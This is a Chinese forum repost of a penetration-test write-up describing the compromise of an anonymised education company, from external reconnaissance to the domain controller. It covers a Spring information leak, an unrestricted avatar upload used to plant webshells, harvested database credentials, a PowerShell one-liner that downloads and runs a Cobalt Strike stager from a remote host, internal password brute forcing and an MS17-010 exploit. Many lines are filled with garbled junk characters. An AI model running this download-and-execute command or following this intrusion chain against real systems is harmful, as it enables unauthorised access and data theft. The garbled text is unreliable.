|
& p3 Z* A/ L9 E/ @- Y' k 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
9 [( h" O! l& j& I L W" a + l& U$ D% ^& {# _. G$ Q; I
$ L- N6 k& ^) |
( x# G" E% K; n3 U% I
* e( }* j; X& ]' D- G8 l" v# N4 k' B$ Z# U6 D8 {& f2 S
正文
; s/ M3 A/ G, O+ s1 n {2 `* z
% f1 O2 y: x. t
; Q9 {: g; }* F
/ N ^5 c! d* i, H5 }6 }( b2 a & j3 u) \6 j. o' E5 P( |( X
. t5 z" p+ i h8 N6 Y+ d 目标:www.xxxx.com(一家教育机构)
+ w8 Y) s5 _' _ s打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能- [0 J' [4 }) f7 Y: s6 I
9 K) R0 _; I" j) W# U5 n
5 f9 X# o5 X4 s) b 
4 ]$ U# m ~5 k* l ' c: I( ~# k! T+ T7 o/ ?
! j' O5 ]6 t; R Y z/ L 进行了简单的信息搜集
3 N3 f4 \0 M" d/ y: [4 A
0 m+ ^ u0 k6 y7 z7 o! W. ^4 c4 A) r3 q7 @; b& _8 ~- C u+ y
6 P* b c* {1 m6 Z/ Z- n
, D; N" m: M! S+ l% q7 I 子域名搜集
& x' i- F" O6 O" N8 j
! i- }0 O# |" z& K, ]2 D; \- y9 ?
; k9 d% i- A2 V 1 {# s% t. d k. o1 l
# W+ d9 u6 Y X. d fofa找资产
1 N# E+ h# S4 n: g
0 k& X' r4 N) F% {
' ?6 P0 ], Q! _" M' f- G 8 z) v2 Q: K7 ]4 q9 w( ^, R @
, c N, H% b! q8 J" A
+ K( m+ K h( S 7 F4 { d& g. q. q
& W O" M/ }1 j( x- {
一共七个资产。去重之后只有两个。
0 Q$ e- T& n% x4 G
) h6 W" c8 m. u, H! t5 {+ ?6 S! T6 R
0 N8 H1 h. @/ b+ ^
8 r( b [9 O& ]' c2 n9 M, u5 T6 I& h8 }* y2 a/ ?& t/ V6 X+ [' M
目录探测( h4 y3 p- k1 Q7 @! [) X, C4 I
# _/ t' c: O5 [
: s! N) T# u) n2 R* h( r
 " X8 P0 W; J0 D+ \8 z5 l
% ?( m" }: } c/ f T8 {4 I3 k' p9 S, j9 F6 T4 y
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
( h P; S% U2 E* j* c/ z5 T6 M
9 E- z' l( B' O, m- G
, w7 x- [7 s }' v
" q' G+ ]% d* s! F7 d
. c3 r6 S7 ?' o) K% r- r5 |* U
我又尝试了通过修改返回包来绕过登录界面
# ?+ |9 x5 s" O0 U( @! |+ B% N' y; f
2 N7 y$ K$ ^) D# N9 K& V' B* i: V5 j4 x# v
 - ~2 y. J' }" |8 y4 _, ]+ q o
) `) b0 Q$ w; G3 ~ a1 N% i0 {" r$ k. M4 A
还是不行,尝试注入无果
: e3 e: ]/ `1 k( {6 T3 a
) k) f* E4 N$ @9 \3 K
( x4 a* L5 B- y6 I5 ?0 v 
, L' ]4 p8 L+ u# G9 T . [+ |4 R% k7 o2 D! j
; H: F8 d; B- p6 C- ^2 C
不过我目录探测出了一处Spring信息泄露
9 N, G- C" y; l4 h I V0 Z1 `9 w, T0 v
1 Q# T& o. r& j; c6 M& G# V, a
7 \" m4 Z" V# p5 O7 T1 c 7 q; _* j" o, J* Z" k3 x5 v
) T4 g' [ K& d0 g' | 
( m5 V: G( f& f9 o 7 M/ }. n, J' M/ U
/ f2 R9 l3 e' u$ s 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 A5 c; B& j2 P
% j0 V! F& x0 g2 N1 w& Z8 p3 o! A t$ p6 M/ {: X
) f7 X4 U9 w/ s% I* ]- o 1 U9 s6 }3 k+ Q" T
5 h" g+ E/ A, ^" s
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
) I& N" `1 N$ w( m" z% Q, |$ |. D : @! z+ K& ?7 o0 i$ B9 K. W
( Q( K' J* f1 q, ]
4 D; |% Y8 f. T; P* N. B
4 Z8 U; V* A W9 C8 E
6 |+ ?8 w( v _# A' m6 M( o 获取有些师傅到这一步就手机抓包电脑测了。
3 O: E4 x* u7 a* w4 y& n
% o- |2 n" N9 H; j5 j% f( A! _" Y8 s& _9 X. e8 T6 o
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
% o$ X1 Y0 Q* B( W, I( U) w
, E4 N" @( I: S* Z" i/ A
- y2 Z" p: h' P9 t 其中在一个公众号发现了小程序,可以进行注册。# ~+ R* W9 a% }4 s, i
5 u9 _+ e3 D$ |# s- ^$ c' S% Z& [& |6 w; Z; L
看到了头像上传,尝试上传获取WebShell. G3 t% C1 c' M Q9 Q3 Z: K
4 O* b% l; E0 m/ `9 B0 [& J
/ z+ H i) [/ e! l( i  1 }7 |) q- {6 G- W( d7 x- K a% w# H
8 i0 f7 E( e9 p! N+ K W# s! a, ^7 m9 o, s) {
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 w* x+ w, ^' L1 k! b
; B6 ?% \3 p" b0 Z' c
1 u- K5 @, e# O+ z |! |  2 y. q! r% R& w+ ?% e+ L
' r3 F0 R& J- L) a: U+ G) |* e
2 B: i% c3 [ v" ]
然后上了大马/ M' S; A' g0 S8 w; |( z" A
3 c: x5 H( v7 b" T% c" x# `+ h% m
" L+ D% x2 Q3 O 
$ k6 z" C& k# n5 l
, r' E& f; G4 Y# u7 m4 S6 X. w8 x* K4 m) i; g0 {) R6 m
$ z( n, `& G& J6 m% I. U6 {; H * o3 I3 i% n1 V0 V N3 Q6 x
1 K2 N* q) x0 C
通过翻找文件发现数据库账号密码) X/ j$ S: e7 }- Q" D7 a- N$ d
/ p. l6 j S* J {& ?6 L0 U! o1 S0 Z/ d5 [: z; B/ m6 V
" B4 t" S$ B ?5 x6 [! L, I 1 o. v3 A# T$ _; U6 b
0 {4 a* O8 w( J# F$ a/ Q
--内网渗透
1 F2 d4 a" w2 a) P! \0 @5 J
`4 \) F- d/ I3 a1 K Z
, q% E+ F- h( M4 V 直接通过powershell执行 cs上线( ?( n) g m2 l
+ ?. y: {- [2 B; I* u) ]# E+ q
" c$ e+ ]; o$ ?
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
2 S9 G4 w3 a7 x. p2 x2 L
% G5 u3 ^) v! n2 V+ A" c0 g
3 @3 s- V) B* Z( p$ K. [" F" I 
. p3 O Y9 f- U$ g" G% {$ n
7 [: K# |9 t2 P& F& M
; b7 o {1 I% i7 [, Z* X 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
L+ I2 _$ I# m- L5 ~/ j
: D1 n( d# G6 g' l5 f9 x
2 v6 ?' {! [- L! P2 G; }& ^4 M  {, K& w q! s% \1 T" k
3 {0 z |: X+ L3 ]( g! m% C3 C6 X0 V f
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
) A. D; G# u8 Q& ^
3 U. F8 k3 F" Q
: s4 B/ c9 D; |& a/ |3 {- t% d$ i
5 S8 v& e: C# H* b5 W
/ v8 X. q. V9 f/ h/ R0 g( k8 A! `8 x, d* L8 K& W3 [) ]
9 s$ R+ `- S: R
1 Z1 k$ h8 d1 r# ]! {% H, {/ I9 d# Y( x- x& C6 h7 ^; w, C
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
/ O2 v8 W: }$ j& D5 W7 `/ U! d
3 E% V. j1 |9 v4 O
2 l. y5 A. x1 E ' k3 \6 w# a" I$ w& p7 d: z9 M3 o' V
4 u7 k( c5 J: x5 j 
7 C- t7 t( q$ |: Q. U* [& S
' N; Z% |2 s- M# G# E3 W) J9 M4 k4 H
+ H$ h0 \& d9 Z) U: H. x
; {1 _+ u! G) O8 N
( }- L) Z3 u8 o
% j1 g! ?6 }: B0 o
' e4 z; Q$ ? v9 U7 ?# c
' e, G8 F4 [# g A7 [4 u" l
$ |1 h! c4 E: m6 j) ]8 O; F% [
0 D# e% S. L% m; @
+ n$ [/ Y) k6 f: ?$ b8 U+ q 小结. N" ^; z3 {# Y: Q0 }# n
! G, S- n; c) d2 E5 d
& A6 {" b5 I# Q- _
/ x0 d+ M) j, q* |$ |1 ~
& G2 F6 U& T0 O8 F. U ~% U) C3 J# V/ z. [
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!! v: X/ ]- `: P: I
8 d: R3 t8 f4 c, B2 J* W$ H3 r, \# }% t
3 m2 D' ]4 M, h- Y7 x
2 a+ p: @- s e6 B1 B( @" a
, G: ?7 _$ y; O: ^/ z -
/ M3 u2 q; u# g! G P: R2 Z/ x* ? % `/ m# J0 \' j/ g
% } Q. V+ x b1 x7 B
-
4 [$ m/ `/ c2 f7 f( j0 A 4 _0 ^, G3 e% p$ K- n
- w0 C' @9 w8 w( ^; L( v" H" E
; _ {/ W5 F. v; g/ A3 t
2 [2 F. p$ W4 L" q2 m" f+ y3 W
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html2 s9 K9 w( T' N! B! Z
5 X0 s5 v) ]5 V! \+ L0 |3 A- C
( O/ N J; m0 H; m* n" `6 _
5 F6 x- ]% N L9 L0 s! W | 
发表于 2024-3-1 19:41:32
收藏
支持
反对